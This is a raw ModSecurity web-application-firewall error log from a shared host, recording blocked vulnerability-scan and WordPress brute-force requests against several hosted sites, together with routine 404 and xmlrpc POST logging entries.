[Tue May 26 15:58:28.533403 2026] [security2:error] [pid 762634:tid 762791] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1zLx8rj1VZMqUAOdePwAAABs"]
[Tue May 26 15:58:29.889949 2026] [security2:error] [pid 762634:tid 762873] [client 91.238.181.19:47880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1zbx8rj1VZMqUAOdehAAAAG0"]
[Tue May 26 15:58:31.123814 2026] [security2:error] [pid 762634:tid 762855] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1zrx8rj1VZMqUAOdenAAAAFs"]
[Tue May 26 15:58:31.359251 2026] [security2:error] [pid 762634:tid 762794] [client 91.238.181.19:47898] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1z7x8rj1VZMqUAOdevQAAAB4"]
[Tue May 26 15:58:32.893289 2026] [security2:error] [pid 762634:tid 762784] [client 91.238.181.19:47920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV10Lx8rj1VZMqUAOde7QAAABQ"]
[Tue May 26 15:58:32.975444 2026] [security2:error] [pid 762634:tid 762771] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV10Lx8rj1VZMqUAOde5AAAAAc"]
[Tue May 26 15:58:34.299660 2026] [security2:error] [pid 762634:tid 762817] [client 103.153.130.62:50072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV10rx8rj1VZMqUAOdfGgAAADU"]
[Tue May 26 15:58:34.299811 2026] [security2:error] [pid 762634:tid 762817] [client 103.153.130.62:50072] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV10rx8rj1VZMqUAOdfGgAAADU"]
[Tue May 26 15:58:34.428839 2026] [security2:error] [pid 762634:tid 762801] [client 91.238.181.19:47932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV10rx8rj1VZMqUAOdfHwAAACU"]
[Tue May 26 15:58:34.659356 2026] [security2:error] [pid 762634:tid 762767] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV10rx8rj1VZMqUAOdfFwAAAAM"]
[Tue May 26 15:58:35.397376 2026] [security2:error] [pid 762634:tid 762735] [remote 74.7.227.15:47102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.227.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "avprealty.com"] [uri "/xmlrpc.php"] [unique_id "ahV107x8rj1VZMqUAOdfLgAARWQ"], referer: https://avprealty.com/
[Tue May 26 15:58:35.792574 2026] [security2:error] [pid 762634:tid 762769] [client 106.219.85.83:32418] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV107x8rj1VZMqUAOdfQQAAAAU"]
[Tue May 26 15:58:35.792712 2026] [security2:error] [pid 762634:tid 762769] [client 106.219.85.83:32418] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV107x8rj1VZMqUAOdfQQAAAAU"]
[Tue May 26 15:58:35.849952 2026] [security2:error] [pid 762634:tid 762785] [client 91.238.181.19:47954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV107x8rj1VZMqUAOdfQwAAABU"]
[Tue May 26 15:58:36.448492 2026] [security2:error] [pid 762634:tid 762765] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV11Lx8rj1VZMqUAOdfUwAAAAE"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1419348&moderation-hash=7dbb62ec6009b8fd57931c4968ce2f90
[Tue May 26 15:58:37.254599 2026] [security2:error] [pid 762634:tid 762833] [client 91.238.181.19:47974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV11bx8rj1VZMqUAOdffQAAAEU"]
[Tue May 26 15:58:37.309741 2026] [security2:error] [pid 762634:tid 762885] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV11bx8rj1VZMqUAOdfewAAAHk"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1419348&moderation-hash=7dbb62ec6009b8fd57931c4968ce2f90
[Tue May 26 15:58:37.665613 2026] [security2:error] [pid 762634:tid 762864] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV11bx8rj1VZMqUAOdfeAAAAGQ"]
[Tue May 26 15:58:38.746840 2026] [security2:error] [pid 762634:tid 762818] [client 91.238.181.19:48006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV11rx8rj1VZMqUAOdfqgAAADY"]
[Tue May 26 15:58:38.912110 2026] [security2:error] [pid 762634:tid 762836] [client 103.44.52.196:54118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV11rx8rj1VZMqUAOdftQAAAEg"]
[Tue May 26 15:58:38.912313 2026] [security2:error] [pid 762634:tid 762836] [client 103.44.52.196:54118] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV11rx8rj1VZMqUAOdftQAAAEg"]
[Tue May 26 15:58:39.235177 2026] [security2:error] [pid 762634:tid 762824] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV11rx8rj1VZMqUAOdfsQAAADw"]
[Tue May 26 15:58:40.176606 2026] [security2:error] [pid 762634:tid 762840] [client 91.238.181.19:49030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV12Lx8rj1VZMqUAOdfzQAAAEw"]
[Tue May 26 15:58:41.198410 2026] [security2:error] [pid 762634:tid 762771] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV12Lx8rj1VZMqUAOdf3AAAAAc"]
[Tue May 26 15:58:41.611711 2026] [security2:error] [pid 762634:tid 762861] [client 91.238.181.19:49044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV12bx8rj1VZMqUAOdf8QAAAGE"]
[Tue May 26 15:58:43.051828 2026] [security2:error] [pid 762634:tid 762876] [client 91.238.181.19:49076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV127x8rj1VZMqUAOdgGAAAAHA"]
[Tue May 26 15:58:43.570851 2026] [security2:error] [pid 762634:tid 762886] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV127x8rj1VZMqUAOdgGwAAAHo"]
[Tue May 26 15:58:44.038323 2026] [security2:error] [pid 762634:tid 762778] [client 223.123.125.8:64786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 8.125.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV127x8rj1VZMqUAOdgLgAAAA4"]
[Tue May 26 15:58:44.038475 2026] [security2:error] [pid 762634:tid 762778] [client 223.123.125.8:64786] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV127x8rj1VZMqUAOdgLgAAAA4"]
[Tue May 26 15:58:44.507851 2026] [security2:error] [pid 762634:tid 762866] [client 91.238.181.19:49086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV13Lx8rj1VZMqUAOdgRAAAAGY"]
[Tue May 26 15:58:44.702255 2026] [security2:error] [pid 762634:tid 762792] [client 103.153.130.62:50348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV13Lx8rj1VZMqUAOdgSQAAABw"]
[Tue May 26 15:58:44.702375 2026] [security2:error] [pid 762634:tid 762792] [client 103.153.130.62:50348] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV13Lx8rj1VZMqUAOdgSQAAABw"]
[Tue May 26 15:58:44.771283 2026] [security2:error] [pid 762634:tid 762822] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV13Lx8rj1VZMqUAOdgQAAAADo"]
[Tue May 26 15:58:46.216283 2026] [security2:error] [pid 762634:tid 762839] [client 91.238.181.19:49098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV13rx8rj1VZMqUAOdgeQAAAEs"]
[Tue May 26 15:58:46.540717 2026] [security2:error] [pid 762634:tid 762828] [client 106.219.85.83:8379] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV13rx8rj1VZMqUAOdgfgAAAEA"]
[Tue May 26 15:58:46.540805 2026] [security2:error] [pid 762634:tid 762828] [client 106.219.85.83:8379] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV13rx8rj1VZMqUAOdgfgAAAEA"]
[Tue May 26 15:58:47.219875 2026] [security2:error] [pid 762634:tid 762766] [client 14.181.69.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV13rx8rj1VZMqUAOdgiwAAAAI"]
[Tue May 26 15:58:47.454687 2026] [security2:error] [pid 762634:tid 762889] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV137x8rj1VZMqUAOdgjwAAAH0"]
[Tue May 26 15:58:47.753718 2026] [security2:error] [pid 762634:tid 762784] [client 91.238.181.19:49114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV137x8rj1VZMqUAOdgqwAAABQ"]
[Tue May 26 15:58:49.186397 2026] [security2:error] [pid 762634:tid 762766] [client 91.238.181.19:49130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV14bx8rj1VZMqUAOdg1gAAAAI"]
[Tue May 26 15:58:49.534539 2026] [security2:error] [pid 762634:tid 762840] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV14bx8rj1VZMqUAOdg1AAAAEw"]
[Tue May 26 15:58:49.837227 2026] [security2:error] [pid 762634:tid 762698] [remote 95.216.117.13:58166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahV14bx8rj1VZMqUAOdg5QAAaT8"]
[Tue May 26 15:58:50.064115 2026] [security2:error] [pid 762634:tid 762785] [client 69.58.89.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV14bx8rj1VZMqUAOdg9QAAABU"], referer: https://www.anujtradingco.com/
[Tue May 26 15:58:50.586235 2026] [security2:error] [pid 762634:tid 762814] [client 91.238.181.19:35176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV14rx8rj1VZMqUAOdhBgAAADI"]
[Tue May 26 15:58:51.356900 2026] [security2:error] [pid 762634:tid 762798] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV14rx8rj1VZMqUAOdhEAAAACI"]
[Tue May 26 15:58:52.003394 2026] [security2:error] [pid 762634:tid 762879] [client 91.238.181.19:35196] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV15Lx8rj1VZMqUAOdhLQAAAHM"]
[Tue May 26 15:58:52.258041 2026] [security2:error] [pid 762634:tid 762779] [client 69.58.89.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV15Lx8rj1VZMqUAOdhMAAAAA8"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1243563&moderation-hash=8c199ef7aa7ab63174b0ada074d3c667
[Tue May 26 15:58:53.256152 2026] [security2:error] [pid 762634:tid 762828] [client 62.60.130.228:63863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahV15bx8rj1VZMqUAOdhRwAAAEA"]
[Tue May 26 15:58:53.476352 2026] [security2:error] [pid 762634:tid 762830] [client 91.238.181.19:35212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV15bx8rj1VZMqUAOdhVAAAAEI"]
[Tue May 26 15:58:53.586109 2026] [security2:error] [pid 762634:tid 762842] [client 62.60.130.228:65044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahV15bx8rj1VZMqUAOdhXwAAAE4"]
[Tue May 26 15:58:53.832385 2026] [security2:error] [pid 762634:tid 762798] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV15bx8rj1VZMqUAOdhUAAAACI"]
[Tue May 26 15:58:54.022106 2026] [security2:error] [pid 762634:tid 762794] [client 77.68.83.86:59632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kexcouriers.com"] [uri "/images/images/cache.php"] [unique_id "ahV15rx8rj1VZMqUAOdhagAAAB4"], referer: www.google.com
[Tue May 26 15:58:54.854985 2026] [security2:error] [pid 762634:tid 762823] [client 62.60.130.228:49289] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahV15rx8rj1VZMqUAOdhgwAAADs"], referer: https://wordpress.org/
[Tue May 26 15:58:54.990824 2026] [security2:error] [pid 762634:tid 762847] [client 91.238.181.19:35230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV15rx8rj1VZMqUAOdhjwAAAFM"]
[Tue May 26 15:58:55.257908 2026] [security2:error] [pid 762634:tid 762833] [client 103.153.130.62:50625] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV157x8rj1VZMqUAOdhkgAAAEU"]
[Tue May 26 15:58:55.258078 2026] [security2:error] [pid 762634:tid 762833] [client 103.153.130.62:50625] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV157x8rj1VZMqUAOdhkgAAAEU"]
[Tue May 26 15:58:55.416264 2026] [security2:error] [pid 762634:tid 762832] [client 77.68.83.86:59904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kexcouriers.com"] [uri "/images/images/cache.php"] [unique_id "ahV157x8rj1VZMqUAOdhpQAAAEQ"], referer: www.google.com
[Tue May 26 15:58:55.615210 2026] [security2:error] [pid 762634:tid 762846] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV157x8rj1VZMqUAOdhmgAAAFI"]
[Tue May 26 15:58:56.455982 2026] [security2:error] [pid 762634:tid 762863] [client 91.238.181.19:35252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV16Lx8rj1VZMqUAOdhzQAAAGM"]
[Tue May 26 15:58:57.258269 2026] [security2:error] [pid 762634:tid 762876] [client 106.219.85.83:14457] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV16bx8rj1VZMqUAOdh3wAAAHA"]
[Tue May 26 15:58:57.258482 2026] [security2:error] [pid 762634:tid 762876] [client 106.219.85.83:14457] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV16bx8rj1VZMqUAOdh3wAAAHA"]
[Tue May 26 15:58:57.628433 2026] [security2:error] [pid 762634:tid 762889] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV16bx8rj1VZMqUAOdh6AAAAH0"]
[Tue May 26 15:58:57.924113 2026] [security2:error] [pid 762634:tid 762872] [client 91.238.181.19:35274] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV16bx8rj1VZMqUAOdh8wAAAGw"]
